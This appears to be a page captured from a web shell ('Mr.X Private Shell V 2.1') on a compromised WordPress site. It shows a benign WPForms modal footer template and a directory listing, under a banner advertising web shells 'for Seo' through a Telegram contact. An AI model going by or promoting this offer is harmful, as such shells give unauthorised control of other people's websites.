__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* What's New modal footer.
*
* @since 1.8.7
*
* @var string $title Footer title.
* @var string $description Footer content.
* @var array $upgrade Upgrade link.
*/
if ( ! defined( 'ABSPATH' ) ) {
exit;
}
?>
<footer>
<div class="wpforms-splash-footer-content">
<h2><?php echo esc_html( $title ); ?></h2>
<p><?php echo esc_html( $description ); ?></p>
</div>
<a href="<?php echo esc_url( $upgrade['url'] ); ?>" class="wpforms-btn wpforms-btn-green" target="_blank" rel="noopener noreferrer"><?php echo esc_html( $upgrade['text'] ); ?></a>
</footer>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| footer.php | File | 575 B | 0775 |
|
| header.php | File | 448 B | 0775 |
|
| modal.php | File | 1.35 KB | 0775 |
|
| section.php | File | 1.54 KB | 0775 |
|